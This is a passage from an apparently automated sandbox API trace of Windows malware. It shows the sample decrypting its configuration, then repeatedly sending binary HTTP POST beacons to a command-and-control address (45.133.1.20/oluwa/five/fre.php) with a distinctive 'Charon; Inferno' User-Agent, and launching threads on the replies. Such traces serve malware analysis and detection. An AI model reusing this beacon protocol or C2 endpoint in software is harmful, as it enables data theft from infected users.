(hProv=0x6beca0, dwFlags=0x0) returned 1 [0229.536] GetProcessHeap () returned 0x6a0000 [0229.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.544] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.544] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.545] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.546] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.546] GetProcessHeap () returned 0x6a0000 [0229.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0229.546] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.546] GetProcessHeap () returned 0x6a0000 [0229.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0229.547] GetProcessHeap () returned 0x6a0000 [0229.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.547] GetProcessHeap () returned 0x6a0000 [0229.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0229.548] GetProcessHeap () returned 0x6a0000 [0229.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0229.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0229.567] GetProcessHeap () returned 0x6a0000 [0229.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0229.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.568] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0229.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.569] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.570] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.570] GetProcessHeap () returned 0x6a0000 [0229.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0229.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.572] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0229.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.573] CryptDestroyKey (hKey=0x6ad020) returned 1 [0229.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.574] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0229.574] GetProcessHeap () returned 0x6a0000 [0229.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.575] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0229.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.576] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0229.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.577] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0229.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.578] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0229.578] GetProcessHeap () returned 0x6a0000 [0229.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0229.578] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0229.578] GetProcessHeap () returned 0x6a0000 [0229.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0229.578] socket (af=2, type=1, protocol=6) returned 0x6f0 [0229.579] connect (s=0x6f0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0229.601] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0229.602] GetProcessHeap () returned 0x6a0000 [0229.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0229.602] GetProcessHeap () returned 0x6a0000 [0229.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0229.602] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.603] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.603] GetProcessHeap () returned 0x6a0000 [0229.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9180 [0229.603] GetProcessHeap () returned 0x6a0000 [0229.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.605] GetProcessHeap () returned 0x6a0000 [0229.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0229.605] GetProcessHeap () returned 0x6a0000 [0229.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0229.606] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.607] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.607] GetProcessHeap () returned 0x6a0000 [0229.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0229.607] GetProcessHeap () returned 0x6a0000 [0229.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.607] send (s=0x6f0, buf=0x6bd460*, len=242, flags=0) returned 242 [0229.608] send (s=0x6f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0229.608] GetProcessHeap () returned 0x6a0000 [0229.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0229.608] recv (in: s=0x6f0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0229.697] GetProcessHeap () returned 0x6a0000 [0229.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0229.698] GetProcessHeap () returned 0x6a0000 [0229.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0229.698] GetProcessHeap () returned 0x6a0000 [0229.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9180 | out: hHeap=0x6a0000) returned 1 [0229.699] GetProcessHeap () returned 0x6a0000 [0229.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0229.700] closesocket (s=0x6f0) returned 0 [0229.701] GetProcessHeap () returned 0x6a0000 [0229.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0229.701] GetProcessHeap () returned 0x6a0000 [0229.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.701] GetProcessHeap () returned 0x6a0000 [0229.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0229.703] GetProcessHeap () returned 0x6a0000 [0229.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0229.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1418) returned 0x6f0 [0229.706] Sleep (dwMilliseconds=0xea60) [0229.707] GetProcessHeap () returned 0x6a0000 [0229.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0229.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0229.729] GetProcessHeap () returned 0x6a0000 [0229.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0229.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.731] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0229.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.732] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.733] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.733] GetProcessHeap () returned 0x6a0000 [0229.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0229.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.735] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0229.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.736] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0229.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.737] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0229.737] GetProcessHeap () returned 0x6a0000 [0229.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.742] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.743] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.744] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.745] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.745] GetProcessHeap () returned 0x6a0000 [0229.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0229.745] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.746] GetProcessHeap () returned 0x6a0000 [0229.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0229.746] GetProcessHeap () returned 0x6a0000 [0229.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.749] GetProcessHeap () returned 0x6a0000 [0229.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0229.749] GetProcessHeap () returned 0x6a0000 [0229.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0229.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0229.766] GetProcessHeap () returned 0x6a0000 [0229.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0229.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.767] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0229.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.768] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.770] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.771] GetProcessHeap () returned 0x6a0000 [0229.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0229.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.772] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0229.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.773] CryptDestroyKey (hKey=0x6ad020) returned 1 [0229.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.774] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0229.774] GetProcessHeap () returned 0x6a0000 [0229.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.775] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0229.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.776] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0229.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.777] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0229.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.778] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0229.778] GetProcessHeap () returned 0x6a0000 [0229.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0229.778] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0229.778] GetProcessHeap () returned 0x6a0000 [0229.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0229.778] socket (af=2, type=1, protocol=6) returned 0x6f4 [0229.779] connect (s=0x6f4, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0229.806] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0229.806] GetProcessHeap () returned 0x6a0000 [0229.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0229.806] GetProcessHeap () returned 0x6a0000 [0229.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0229.807] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.808] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.808] GetProcessHeap () returned 0x6a0000 [0229.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d99c0 [0229.808] GetProcessHeap () returned 0x6a0000 [0229.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.808] GetProcessHeap () returned 0x6a0000 [0229.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0229.808] GetProcessHeap () returned 0x6a0000 [0229.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0229.809] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.810] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.810] GetProcessHeap () returned 0x6a0000 [0229.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0229.810] GetProcessHeap () returned 0x6a0000 [0229.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.810] send (s=0x6f4, buf=0x6bd460*, len=242, flags=0) returned 242 [0229.811] send (s=0x6f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0229.811] GetProcessHeap () returned 0x6a0000 [0229.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0229.811] recv (in: s=0x6f4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0229.901] GetProcessHeap () returned 0x6a0000 [0229.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0229.902] GetProcessHeap () returned 0x6a0000 [0229.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0229.902] GetProcessHeap () returned 0x6a0000 [0229.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d99c0 | out: hHeap=0x6a0000) returned 1 [0229.903] GetProcessHeap () returned 0x6a0000 [0229.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0229.903] closesocket (s=0x6f4) returned 0 [0229.904] GetProcessHeap () returned 0x6a0000 [0229.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0229.904] GetProcessHeap () returned 0x6a0000 [0229.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.906] GetProcessHeap () returned 0x6a0000 [0229.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0229.906] GetProcessHeap () returned 0x6a0000 [0229.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0229.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x141c) returned 0x6f4 [0229.910] Sleep (dwMilliseconds=0xea60) [0229.926] GetProcessHeap () returned 0x6a0000 [0229.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0229.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.929] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.942] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0229.953] GetProcessHeap () returned 0x6a0000 [0229.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0229.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.955] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0229.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.965] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.966] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.966] GetProcessHeap () returned 0x6a0000 [0229.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0229.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.968] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0229.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.969] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0229.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.972] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0229.972] GetProcessHeap () returned 0x6a0000 [0229.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.974] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.975] StrStrA 